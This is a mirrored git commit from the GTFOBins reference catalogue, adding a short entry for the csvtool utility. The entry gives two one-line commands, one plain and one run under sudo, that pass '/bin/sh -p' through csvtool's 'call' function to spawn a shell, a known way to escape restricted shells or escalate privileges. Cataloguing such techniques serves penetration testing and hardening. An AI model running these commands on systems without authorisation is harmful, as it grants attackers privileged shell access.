1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-10-18 05:18:13 +02:00

Add csvtool

This commit is contained in:
F.Romero 2021-03-17 22:50:42 +01:00 committed by GitHub
parent b9ef170f4c
commit 9431dd9daf
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

7
_gtfobins/csvtool.md Normal file

@ -0,0 +1,7 @@
---
functions:
shell:
- code: csvtool call '/bin/sh -p;false' /etc/passwd
sudo:
- code: sudo csvtool call '/bin/sh -p;false' /etc/passwd
---